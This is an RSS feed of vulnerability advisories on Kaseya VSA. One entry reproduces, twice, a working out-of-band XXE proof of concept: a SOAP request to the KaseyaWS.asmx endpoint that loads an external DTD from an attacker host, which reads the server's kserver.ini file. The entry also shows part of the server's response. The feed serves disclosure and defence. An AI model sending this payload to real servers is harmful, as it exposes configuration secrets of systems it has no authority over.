<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Mon, 05 Oct 2026 15:12:05 +0000</lastBuildDate>
    <item>
      <title>certfr-2021-avi-514 — De multiples vulnérabilités ont été découvertes dans Kaseya VSA. Elles
permettent à un attaquant de provoquer un contou…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2021-avi-514</link>
      <description>certfr-2021-avi-514</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2021-avi-514</guid>
    </item>
    <item>
      <title>EUVD-2026-26672</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-26672</link>
      <description>EUVD-2026-26672</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-26672</guid>
    </item>
    <item>
      <title>fkie_cve-2021-30201</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2021-30201</link>
      <description>&lt;p&gt;The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;#34;http://schemas.xmlsoap.org/soap/envelope/&amp;#34; xmlns:kas=&amp;#34;KaseyaWS&amp;#34;&amp;gt; &amp;lt;soapenv:Header/&amp;gt; &amp;lt;soapenv:Body&amp;gt; &amp;lt;kas:PrimitiveResetPassword&amp;gt; &amp;lt;!--type: string--&amp;gt; &amp;lt;kas:XmlRequest&amp;gt;&amp;lt;![CDATA[&amp;lt;!DOCTYPE data SYSTEM &amp;#34;http://192.168.1.170:8080/oob.dtd&amp;#34;&amp;gt;&amp;lt;data&amp;gt;&amp;amp;send;&amp;lt;/data&amp;gt;]]&amp;gt; &amp;lt;/kas:XmlRequest&amp;gt; &amp;lt;/kas:PrimitiveResetPassword&amp;gt; &amp;lt;/soapenv:Body&amp;gt; &amp;lt;/soapenv:Envelope&amp;gt; ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` &amp;lt;!ENTITY % file SYSTEM &amp;#34;file://c:\\kaseya\\kserver\\kserver.ini&amp;#34;&amp;gt; &amp;lt;!ENTITY % eval &amp;#34;&amp;lt;!ENTITY &amp;amp;#x25; error SYSTEM &amp;#39;file:///nonexistent/%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt; %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 &amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;utf-8&amp;#34;?&amp;gt;&amp;lt;soap:Envelope xmlns:soap=&amp;#34;http://schemas.xmlsoap.org/soap/envelope/&amp;#34;…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;#34;http://schemas.xmlsoap.org/soap/envelope/&amp;#34; xmlns:kas=&amp;#34;KaseyaWS&amp;#34;&amp;gt; &amp;lt;soapenv:Header/&amp;gt; &amp;lt;soapenv:Body&amp;gt; &amp;lt;kas:PrimitiveResetPassword&amp;gt; &amp;lt;!--type: string--&amp;gt; &amp;lt;kas:XmlRequest&amp;gt;&amp;lt;![CDATA[&amp;lt;!DOCTYPE data SYSTEM &amp;#34;http://192.168.1.170:8080/oob.dtd&amp;#34;&amp;gt;&amp;lt;data&amp;gt;&amp;amp;send;&amp;lt;/data&amp;gt;]]&amp;gt; &amp;lt;/kas:XmlRequest&amp;gt; &amp;lt;/kas:PrimitiveResetPassword&amp;gt; &amp;lt;/soapenv:Body&amp;gt; &amp;lt;/soapenv:Envelope&amp;gt; ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` &amp;lt;!ENTITY % file SYSTEM &amp;#34;file://c:\\kaseya\\kserver\\kserver.ini&amp;#34;&amp;gt; &amp;lt;!ENTITY % eval &amp;#34;&amp;lt;!ENTITY &amp;amp;#x25; error SYSTEM &amp;#39;file:///nonexistent/%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt; %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 &amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;utf-8&amp;#34;?&amp;gt;&amp;lt;soap:Envelope xmlns:soap=&amp;#34;http://schemas.xmlsoap.org/soap/envelope/&amp;#34;…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2021-30201</guid>
    </item>
    <item>
      <title>GHSA-xx66-m4r3-r5vf</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-xx66-m4r3-r5vf</link>
      <description>&lt;p&gt;An XML External Entity (XXE) issue exists in Kaseya VSA before 9.5.6.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;An XML External Entity (XXE) issue exists in Kaseya VSA before 9.5.6.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-xx66-m4r3-r5vf</guid>
    </item>
    <item>
      <title>gsd-2021-30201</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2021-30201</link>
      <description>gsd-2021-30201</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2021-30201</guid>
    </item>
  </channel>
</rss>
